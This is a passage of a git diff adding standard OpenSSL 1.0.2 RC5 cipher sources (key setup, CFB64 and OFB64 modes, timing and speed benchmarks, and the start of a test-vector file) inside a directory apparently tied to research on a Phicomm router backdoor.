+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc5.h>
+#include "rc5_locl.h"
+
+void RC5_32_set_key(RC5_32_KEY *key, int len, const unsigned char *data,
+                    int rounds)
+{
+    RC5_32_INT L[64], l, ll, A, B, *S, k;
+    int i, j, m, c, t, ii, jj;
+
+    if ((rounds != RC5_16_ROUNDS) &&
+        (rounds != RC5_12_ROUNDS) && (rounds != RC5_8_ROUNDS))
+        rounds = RC5_16_ROUNDS;
+
+    key->rounds = rounds;
+    S = &(key->data[0]);
+    j = 0;
+    for (i = 0; i <= (len - 8); i += 8) {
+        c2l(data, l);
+        L[j++] = l;
+        c2l(data, l);
+        L[j++] = l;
+    }
+    ii = len - i;
+    if (ii) {
+        k = len & 0x07;
+        c2ln(data, l, ll, k);
+        L[j + 0] = l;
+        L[j + 1] = ll;
+    }
+
+    c = (len + 3) / 4;
+    t = (rounds + 1) * 2;
+    S[0] = RC5_32_P;
+    for (i = 1; i < t; i++)
+        S[i] = (S[i - 1] + RC5_32_Q) & RC5_32_MASK;
+
+    j = (t > c) ? t : c;
+    j *= 3;
+    ii = jj = 0;
+    A = B = 0;
+    for (i = 0; i < j; i++) {
+        k = (S[ii] + A + B) & RC5_32_MASK;
+        A = S[ii] = ROTATE_l32(k, 3);
+        m = (int)(A + B);
+        k = (L[jj] + A + B) & RC5_32_MASK;
+        B = L[jj] = ROTATE_l32(k, m);
+        if (++ii >= t)
+            ii = 0;
+        if (++jj >= c)
+            jj = 0;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5cfb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5cfb64.c
new file mode 100644
index 0000000..a3813e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5cfb64.c
@@ -0,0 +1,123 @@
+/* crypto/rc5/rc5cfb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc5.h>
+#include "rc5_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void RC5_32_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                          long length, RC5_32_KEY *schedule,
+                          unsigned char *ivec, int *num, int encrypt)
+{
+    register unsigned long v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned long ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = (unsigned char *)ivec;
+    if (encrypt) {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                ti[0] = v0;
+                c2l(iv, v1);
+                ti[1] = v1;
+                RC5_32_encrypt((unsigned long *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2c(t, iv);
+                t = ti[1];
+                l2c(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                ti[0] = v0;
+                c2l(iv, v1);
+                ti[1] = v1;
+                RC5_32_encrypt((unsigned long *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2c(t, iv);
+                t = ti[1];
+                l2c(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = t = c = cc = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5ofb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5ofb64.c
new file mode 100644
index 0000000..d3c6306
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5ofb64.c
@@ -0,0 +1,110 @@
+/* crypto/rc5/rc5ofb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc5.h>
+#include "rc5_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void RC5_32_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                          long length, RC5_32_KEY *schedule,
+                          unsigned char *ivec, int *num)
+{
+    register unsigned long v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned char d[8];
+    register char *dp;
+    unsigned long ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = (unsigned char *)ivec;
+    c2l(iv, v0);
+    c2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = (char *)d;
+    l2c(v0, dp);
+    l2c(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            RC5_32_encrypt((unsigned long *)ti, schedule);
+            dp = (char *)d;
+            t = ti[0];
+            l2c(t, dp);
+            t = ti[1];
+            l2c(t, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+        v0 = ti[0];
+        v1 = ti[1];
+        iv = (unsigned char *)ivec;
+        l2c(v0, iv);
+        l2c(v1, iv);
+    }
+    t = v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5s.cpp
new file mode 100644
index 0000000..1c5518b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5s.cpp
@@ -0,0 +1,70 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/rc5.h>
+
+void main(int argc,char *argv[])
+	{
+	RC5_32_KEY key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+	static unsigned char d[16]={0x01,0x23,0x45,0x67,0x89,0xAB,0xCD,0xEF};
+
+	RC5_32_set_key(&key, 16,d,12);
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			RC5_32_encrypt(&data[0],&key);
+			GetTSC(s1);
+			RC5_32_encrypt(&data[0],&key);
+			RC5_32_encrypt(&data[0],&key);
+			RC5_32_encrypt(&data[0],&key);
+			GetTSC(e1);
+			GetTSC(s2);
+			RC5_32_encrypt(&data[0],&key);
+			RC5_32_encrypt(&data[0],&key);
+			RC5_32_encrypt(&data[0],&key);
+			RC5_32_encrypt(&data[0],&key);
+			GetTSC(e2);
+			RC5_32_encrypt(&data[0],&key);
+			}
+
+		printf("cast %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5speed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5speed.c
new file mode 100644
index 0000000..3f59570
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5speed.c
@@ -0,0 +1,265 @@
+/* crypto/rc5/rc5speed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/rc5.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  define HZ      100.0
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static unsigned char key[] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
+    };
+    RC5_32_KEY sch;
+    double a, b, c, d;
+#ifndef SIGALRM
+    long ca, cb, cc;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    RC5_32_set_key(&sch, 16, key, 12);
+    count = 10;
+    do {
+        long i;
+        unsigned long data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            RC5_32_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count / 512;
+    cb = count;
+    cc = count * 8 / BUFSIZE + 1;
+    printf("Doing RC5_32_set_key %ld times\n", ca);
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing RC5_32_set_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count += 4) {
+        RC5_32_set_key(&sch, 16, key, 12);
+        RC5_32_set_key(&sch, 16, key, 12);
+        RC5_32_set_key(&sch, 16, key, 12);
+        RC5_32_set_key(&sch, 16, key, 12);
+    }
+    d = Time_F(STOP);
+    printf("%ld RC5_32_set_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing RC5_32_encrypt's for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing RC5_32_encrypt %ld times\n", cb);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cb); count += 4) {
+        unsigned long data[2];
+
+        RC5_32_encrypt(data, &sch);
+        RC5_32_encrypt(data, &sch);
+        RC5_32_encrypt(data, &sch);
+        RC5_32_encrypt(data, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld RC5_32_encrypt's in %.2f second\n", count, d);
+    b = ((double)COUNT(cb) * 8) / d;
+
+#ifdef SIGALRM
+    printf("Doing RC5_32_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing RC5_32_cbc_encrypt %ld times on %ld byte blocks\n", cc,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        RC5_32_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), RC5_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld RC5_32_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+    printf("RC5_32/12/16 set_key       per sec = %12.2f (%9.3fuS)\n", a,
+           1.0e6 / a);
+    printf("RC5_32/12/16 raw ecb bytes per sec = %12.2f (%9.3fuS)\n", b,
+           8.0e6 / b);
+    printf("RC5_32/12/16 cbc     bytes per sec = %12.2f (%9.3fuS)\n", c,
+           8.0e6 / c);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5test.c
new file mode 100644
index 0000000..b29a436
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5test.c
@@ -0,0 +1,381 @@
+/* crypto/rc5/rc5test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * This has been a quickly hacked 'ideatest.c'.  When I add tests for other
+ * RC5 modes, more of the code will be uncommented.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_RC5
+int main(int argc, char *argv[])
+{
+    printf("No RC5 support\n");
+    return (0);
+}
+#else
+# include <openssl/rc5.h>
+
+static unsigned char RC5key[5][16] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x91, 0x5f, 0x46, 0x19, 0xbe, 0x41, 0xb2, 0x51,
+     0x63, 0x55, 0xa5, 0x01, 0x10, 0xa9, 0xce, 0x91},
+    {0x78, 0x33, 0x48, 0xe7, 0x5a, 0xeb, 0x0f, 0x2f,
+     0xd7, 0xb1, 0x69, 0xbb, 0x8d, 0xc1, 0x67, 0x87},
+    {0xdc, 0x49, 0xdb, 0x13, 0x75, 0xa5, 0x58, 0x4f,
+     0x64, 0x85, 0xb4, 0x13, 0xb5, 0xf1, 0x2b, 0xaf},
+    {0x52, 0x69, 0xf1, 0x49, 0xd4, 0x1b, 0xa0, 0x15,
+     0x24, 0x97, 0x57, 0x4d, 0x7f, 0x15, 0x31, 0x25},
+};
+
+static unsigned char RC5plain[5][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x21, 0xA5, 0xDB, 0xEE, 0x15, 0x4B, 0x8F, 0x6D},
+    {0xF7, 0xC0, 0x13, 0xAC, 0x5B, 0x2B, 0x89, 0x52},
+    {0x2F, 0x42, 0xB3, 0xB7, 0x03, 0x69, 0xFC, 0x92},
+    {0x65, 0xC1, 0x78, 0xB2, 0x84, 0xD1, 0x97, 0xCC},
+};
+
+static unsigned char RC5cipher[5][8] = {
